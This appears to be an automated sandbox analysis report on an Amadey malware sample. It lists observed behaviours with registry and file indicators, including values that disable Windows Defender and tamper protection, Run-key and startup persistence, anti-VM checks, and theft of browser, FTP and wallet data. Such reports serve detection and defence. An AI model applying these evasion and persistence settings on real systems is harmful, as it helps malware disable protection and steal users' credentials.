Analysis Overview
SHA256
6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc
Threat Level: Known bad
The file 6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc was found to be: Known bad.
Malicious Activity Summary
Amadey
Modifies Windows Defender Real-time Protection settings
Amadey family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Uses browser remote debugging
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
Drops startup file
Reads data files stored by FTP clients
Executes dropped EXE
Reads user/profile data of web browsers
Windows security modification
Loads dropped DLL
Checks computer location settings
Identifies Wine through registry keys
Unsecured Credentials: Credentials In Files
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
UPX packed file
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SendNotifyMessage
Kills process with taskkill
Enumerates system info in registry
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-14 07:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 07:22
Reported
2024-11-14 07:24
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe | C:\Windows\system32\curl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6d59325afb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006149001\\6d59325afb.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\03f4141975.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006150001\\03f4141975.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d6eb7e4fd8.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006152001\\d6eb7e4fd8.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006068001\lum250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006150001\03f4141975.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006152001\d6eb7e4fd8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\DocumentsBFIIEHJDBK.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1006149001\6d59325afb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4g929o.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3e02T.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133760426061420129" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe
"C:\Users\Admin\AppData\Local\Temp\6aca87eee19172b75121aa5c92e48d6baaca872950614deec38ae1d7ea32b1fc.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\u7L07.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\A2M26.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1T30C8.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2r5367.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2r5367.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
